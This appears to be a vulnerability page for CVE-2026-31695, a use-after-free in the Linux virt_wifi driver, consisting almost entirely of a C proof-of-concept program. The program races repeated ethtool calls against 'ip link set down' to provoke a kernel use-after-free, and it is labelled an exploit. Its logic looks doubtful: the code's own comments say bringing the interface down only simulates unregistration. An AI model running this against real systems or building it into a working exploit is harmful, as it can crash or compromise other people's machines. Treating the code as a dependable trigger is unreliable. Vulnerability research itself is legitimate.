CVE-2026-31695: Linux内核virt_wifi释放后重用漏洞

/* * PoC for CVE-2026-31695 * This PoC attempts to trigger the race condition between * device unregistration and ethtool operations. * Compile: gcc -o poc_exploit poc_exploit.c -lpthread */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <pthread.h> #include <sys/socket.h> #include <linux/if.h> void *ethtool_thread(void *arg) { char *iface = (char *)arg; char cmd[100]; // Continuously trigger ethtool operations to race with unregistration while (1) { snprintf(cmd, sizeof(cmd), "ethtool %s", iface); system(cmd); usleep(100); // Short delay to intensify race condition attempts } return NULL; } int main() { pthread_t tid; // Assume the vulnerable virt_wifi interface is named 'wlan0' // This requires the system to have virt_wifi loaded and configured char *iface = "wlan0"; printf("[+] Starting PoC for CVE-2026-31695 (UAF in virt_wifi)...\n"); // Step 1: Start a thread to spam ethtool requests on the target interface // This targets the ethnl_ops_begin path accessing dev.parent pthread_create(&tid, NULL, ethtool_thread, iface); // Step 2: Wait briefly then trigger the device unregister path // In a real scenario, this might involve deleting the wifi interface or module sleep(1); printf("[+] Triggering device unregistration/race condition...\n"); // Simulate the unregister action (e.g., bringing down the interface) // which triggers netdev_run_todo and frees the parent device char cmd[100]; snprintf(cmd, sizeof(cmd), "ip link set %s down", iface); system(cmd); // If successful, the kernel should report a KASAN: slab-use-after-free error printf("[+] Exploit triggered. Check dmesg for KASAN errors.\n"); sleep(2); return 0; }